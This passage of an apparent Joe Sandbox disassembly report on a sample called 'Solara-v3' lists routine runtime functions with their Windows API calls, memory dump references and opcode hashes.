                                                                                                                                                                                                                                              Function 00CA00B4 Relevance: 3.0, APIs: 2, Instructions: 27timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 00CA00EC
                                                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,3F29B6ED,00C98E30,?,00CBBE77,000000FF,?,00C9FDB4,?,00000000,00000000,?,00C9FDD8,?,00C98E30,?), ref: 00CA00F0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$FileSystem$Precise
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 743729956-0
                                                                                                                                                                                                                                              • Opcode ID: 7439b411465cf05183e636bc3773d0d6e2b44b09f277e4074ca9867a0f08b9b8
                                                                                                                                                                                                                                              • Instruction ID: 378ba0436ac1c0c930371da37d8eb76d625a626871d1e82540c82cbd41400add
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7439b411465cf05183e636bc3773d0d6e2b44b09f277e4074ca9867a0f08b9b8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF06532A44654EFC7018F44DD41F9EB7A8F709B54F10016AE81293790DB75AD00DB80
                                                                                                                                                                                                                                              Function 00CB5C5E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CB5BB9,?,?,00000008,?,?,00CBBCAB,00000000), ref: 00CB5E8B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionRaise
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3997070919-0
                                                                                                                                                                                                                                              • Opcode ID: aae4be876f045f032ef2634dca3dcc81110f5478f12dc93cce39ad2d09d0cf62
                                                                                                                                                                                                                                              • Instruction ID: 1ad9fcd6759a3a422e8cfea63feb85129405edf77105b62336eea02177baf2ce
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aae4be876f045f032ef2634dca3dcc81110f5478f12dc93cce39ad2d09d0cf62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3B16131610A08DFD715CF28C58ABA57BE0FF45364F29865CE9A9CF2A1C735DA82CB40
                                                                                                                                                                                                                                              Function 00C9F555 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C9F56B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2325560087-0
                                                                                                                                                                                                                                              • Opcode ID: 3822f782e2b5486a5df0d20f5008b155302750b0d3fcf809f984203139e2fe11
                                                                                                                                                                                                                                              • Instruction ID: 6950a1cff63ed4dc9a15917c8521b0acaa4c34f3fd6ac27b2e4ba5131e2e063e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3822f782e2b5486a5df0d20f5008b155302750b0d3fcf809f984203139e2fe11
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDA14EB29016058FDB18CF94E886B9DBBF9FB48364F24852ED425E73A4D3749A41CF50
                                                                                                                                                                                                                                              Function 00CB1F38 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAD2B4: RtlAllocateHeap.NTDLL(00000008,?,?,?,00CAC1B7,00000001,00000364,?,00000005,000000FF,?,00CA5495,00CC8E38,0000000C), ref: 00CAD2F5
                                                                                                                                                                                                                                              • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CB20D9
                                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00CB21CD
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00CB220C
                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00CB223F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$CloseFile$AllocateFirstHeapNext
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4087847297-0
                                                                                                                                                                                                                                              • Opcode ID: 0fb1afe013c4c116a7e1745ec09e55a2296cdecf56a8bc3a75e7e66337e78226
                                                                                                                                                                                                                                              • Instruction ID: fd1d1fc55dfb7461f044bd2567280f3e962438038aa9b62dee38126eaf7e8933
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fb1afe013c4c116a7e1745ec09e55a2296cdecf56a8bc3a75e7e66337e78226
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15518971904118AFDF24AF789C95AFFB7B9DF85314F184299F85993201EB308E41EB60
                                                                                                                                                                                                                                              Function 00CB1840 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB1894
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: 7ee6d9d750748b6964cc531c4f7b0f9e1ad623268dffa227b3b9ded0b5d63216
                                                                                                                                                                                                                                              • Instruction ID: 409425d96e68f3a14d3caeb56a4d3121b8554952cdeefbf6f727db2fcf2ae6b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ee6d9d750748b6964cc531c4f7b0f9e1ad623268dffa227b3b9ded0b5d63216
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC21F272610206ABDF289B25CC52AFA33ACFF05715F14007AFD12C6181EB35EE00E750
                                                                                                                                                                                                                                              Function 00CA3FB2 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                                                              • Opcode ID: 2ecbfc720a94f034fc87501003a052c1419220d01c1e4002d7bee28dc94beca2
                                                                                                                                                                                                                                              • Instruction ID: 778f9abce0029436e96dc1cdf0d5113c0d953726414e74ed01c0a15a4609b589
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ecbfc720a94f034fc87501003a052c1419220d01c1e4002d7bee28dc94beca2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52B1C57090060B8BCB2CCE68C555ABEBBB1AFC730CF14461EE66297691C7B19F41DB51
                                                                                                                                                                                                                                              Function 00CB14D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CB1580,00000001,00000000,?,-00000050,?,00CB1363,00000000,-00000002,00000000,?,00000055,?), ref: 00CB154A
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 0246f38231ac3db739bf553480f1811b2de12853b9a4f1b855f82ab8ef24fdd4
                                                                                                                                                                                                                                              • Instruction ID: 2a84d3cda0f93e50b175348606e466dba65474b6d414248f8294ad1126d0346f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0246f38231ac3db739bf553480f1811b2de12853b9a4f1b855f82ab8ef24fdd4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9811E9362007015FDB289F39C8A16FAB791FF80768F58442CE94747B40E771B942D750
                                                                                                                                                                                                                                              Function 00CB1960 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB19B4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: 9d110845021ea57acbc4f43d4e061997946a97b92bc5e4019e5eb95625514f5a
                                                                                                                                                                                                                                              • Instruction ID: d6ce288f9188660e5d775994d6def3dec69fb47908315962a8ce614365af4804
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d110845021ea57acbc4f43d4e061997946a97b92bc5e4019e5eb95625514f5a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7711E032A00206ABDB14AB68CC62AFE73ACEF05714F24417AF912D7141EB38EE05A750
                                                                                                                                                                                                                                              Function 00CB1B0D Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CB179C,00000000,00000000,?), ref: 00CB1B39
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: e86051361543ce644b6712a6ccb37d6a3b1ff595cddcff0fd96c63f3eebb3e8b
                                                                                                                                                                                                                                              • Instruction ID: 9b437e08d35015415954ef754f7143051854a5bfc531be52f3a66f14af45a6fc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e86051361543ce644b6712a6ccb37d6a3b1ff595cddcff0fd96c63f3eebb3e8b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9801F472710122ABDB2C5B65CC2ABFA3768EF40758F594478ED16A3180FA74FE41D690
                                                                                                                                                                                                                                              Function 00CB17D3 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CB1840,00000001,?,?,-00000050,?,00CB132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00CB181D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 4ceebc9b35973a86c67cb0cf1c6bf48eebfdb6b4a9855632c12e90ef94ae4ab8
                                                                                                                                                                                                                                              • Instruction ID: 001b60b879ac46913e92e6146ce41ace8691e8adeb99a6c2f5e76fa4f9180384
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ceebc9b35973a86c67cb0cf1c6bf48eebfdb6b4a9855632c12e90ef94ae4ab8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90F046323003041FCB245F79DC91ABA7B91FF80768F09842CFE058B680C6B29D02D650
                                                                                                                                                                                                                                              Function 00CAD1BD Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CA80E1: EnterCriticalSection.KERNEL32(?,?,00CAC5F8,?,00CC9290,00000008,00CAC4EA,?,?,?), ref: 00CA80F0
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CAD1B0,00000001,00CC9310,0000000C,00CACB11,-00000050), ref: 00CAD1F5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033030136.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033068489.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033085518.0000000000CCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033099686.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033120728.0000000000CCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033137824.0000000000CD2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2033168531.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_c90000_Solara-v3.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                              • Opcode ID: abb93a9a40a4e706f1935f9b6917da8a58dc2e6eca56d5d812de8d82be64120f
                                                                                                                                                                                                                                              • Instruction ID: 3266a3d1b1482b015f24d87218853e73df96e2328572173a1dce27bc30df4894
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb93a9a40a4e706f1935f9b6917da8a58dc2e6eca56d5d812de8d82be64120f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CF04972A00305EFDB10DFA8E842B9DB7F0EB45725F00812AF412DB2A0CB758940DF90
                                                                                                                                                                                                                                              Function 00CB1915 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: GetLastError.KERNEL32(?,?,00CA5495,00CC8E38,0000000C), ref: 00CAC16E
                                                                                                                                                                                                                                                • Part of subcall function 00CAC16A: SetLastError.KERNEL32(00000000), ref: 00CAC210
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00CB1960,00000001,?,?,?,00CB1385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00CB194C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2033044910.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
